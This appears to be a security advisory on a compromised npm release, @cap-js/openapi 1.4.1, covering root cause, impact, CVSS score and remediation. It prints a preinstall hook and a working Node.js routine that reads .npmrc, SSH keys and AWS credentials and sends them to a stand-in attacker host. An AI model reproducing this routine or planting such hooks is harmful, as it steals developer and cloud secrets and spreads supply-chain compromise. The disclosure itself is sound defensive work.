GHSA-JPVJ-WPMJ-H7RV: Supply Chain Compromise and Malicious Code Injection in @cap-js/openapi

The @cap-js/openapi library is a Node.js package utilized within SAP Cloud Application Programming Model (CAP) environments to handle OpenAPI integrations. On May 19, 2026, version 1.4.1 was published to the public npm registry containing malicious code. This occurrence represents a critical supply chain compromise where distribution infrastructure, rather than the public source code repository, was subverted.

Downstream applications and automated CI/CD pipelines that resolved and installed @cap-js/openapi version 1.4.1 executed the injected payload during installation or module resolution. The vulnerability presents a significant security risk because the payload operates with the execution privileges of the active Node.js process or system build user.

This analysis details the technical mechanism of the credential harvesting, the exfiltration vectors, and the precise remediation procedures required to secure affected development and deployment environments.

The root cause is classified under CWE-506: Embedded Malicious Code. The vulnerability does not stem from a logical coding error, memory unsafety, or design flaw in the development repository of @cap-js/openapi. Instead, the compromise occurred at the publishing tier of the software lifecycle, where an attacker obtained authorization credentials for the npm registry or hijacked a deployment pipeline.

The attacker modified the distributed package contents to inject malicious JavaScript routines that execute automatically during package installation or application startup. This form of dependency-jacking bypasses standard static code analysis checks that inspect only the public GitHub repository, as the malicious code was present exclusively in the npm registry artifact.

The malicious payload operates by reading environment configurations, local filesystem directories, and process spaces to extract highly privileged access materials. The lack of strict isolation between package resolution and runtime execution in standard Node.js package managers allows the payload to run with the full permissions of the invoking security context.

The malicious code was embedded directly within the distribution artifact of version 1.4.1. Such injections rely on package lifecycle hooks, such as the preinstall or postinstall scripts declared in package.json, or direct modifications to main entry point files.

Below is an analytical representation of the package descriptor file structure utilized to trigger automatic execution during the dependency resolution phase:

{
  "name": "@cap-js/openapi",
  "version": "1.4.1",
  "scripts": {
    "preinstall": "node ./lib/setup.js"
  }
}

The targeted code-level change within the distribution's active source files, such as lib/setup.js, involved inserting a credential-harvesting routine. An abstracted representation of the data exfiltration function implemented by the threat actor is shown below:

// Malicious routine embedded into version 1.4.1
const fs = require('fs');
const path = require('path');
const https = require('https');
 
function harvestSecrets() {
  const paths = [
    path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc'),
    path.join(process.env.HOME || process.env.USERPROFILE, '.ssh', 'id_rsa'),
    path.join(process.env.HOME || process.env.USERPROFILE, '.aws', 'credentials')
  ];
 
  paths.forEach(p => {
    if (fs.existsSync(p)) {
      const content = fs.readFileSync(p, 'utf8');
      transmitData(p, content);
    }
  });
}
 
function transmitData(filePath, content) {
  const data = JSON.stringify({ file: filePath, payload: content });
  const req = https.request({
    hostname: 'attacker-c2-domain.com',
    port: 443,
    path: '/exfil',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
  });
  req.write(data);
  req.end();
}
 
harvestSecrets();

To correct the compromise, the maintainers released version 1.4.2. The fix consisted of removing the unauthorized files from the npm package and regenerating publishing secrets to ensure only verified, untampered source code was distributed.

Exploitation requires no deliberate attack actions targeting the victim application once the compromised package is listed in dependency locks. The execution flow begins when a developer or a CI/CD agent runs npm install or npm update and retrieves @cap-js/openapi version 1.4.1.

The malware targets the local environment where the execution occurs, checking for administrative secrets. Specifically, it searches for .npmrc files containing registry authentication tokens, private cryptographic keys from SSH directories, and cloud access keys within cloud provider config directories. Once compiled, this sensitive metadata is transmitted over an encrypted outbound HTTPS channel to a command-and-control server operated by the threat actor.

The impact of this supply chain compromise is severe, resulting in complete compromise of confidentiality, integrity, and availability for the affected system. Stolen credentials, including AWS keys, NPM publish tokens, and private SSH keys, provide the threat actor with persistent administrative access to other platforms.

Using harvested GitHub Personal Access Tokens (PATs) and NPM credentials, the actor can log in to other developer repositories and propagate the malicious payload upstream. This self-propagating loop escalates the breach from a single localized server compromise to a wider enterprise-level supply chain attack.

The CVSS v3.1 base score of 9.6 reflects the critical nature of the attack vector. Because the execution is silent and occurs during standard development or testing workflows, detection times can be prolonged, increasing the window of exposure for harvested production credentials.

Remediation must be executed immediately on any host where @cap-js/openapi version 1.4.1 was installed. The first step is to upgrade the dependency to version 1.4.2 or above, which removes the backdoored code. Verify the active installation using dependency listing commands.

npm ls @cap-js/openapi

If version 1.4.1 is detected in the dependency graph, the host system must be treated as untrusted. All active developer sessions, execution nodes, and CI/CD containers must be recycled. All private credentials, including AWS keys, GitHub tokens, database connection strings, and NPM tokens, must be revoked and rotated immediately.

Implement security controls to prevent future supply chain compromises. Use dependency lockfile verification, configure registry proxy tools that scan for known malicious packages, and limit the access permissions of CI/CD runners to the minimum necessary scopes.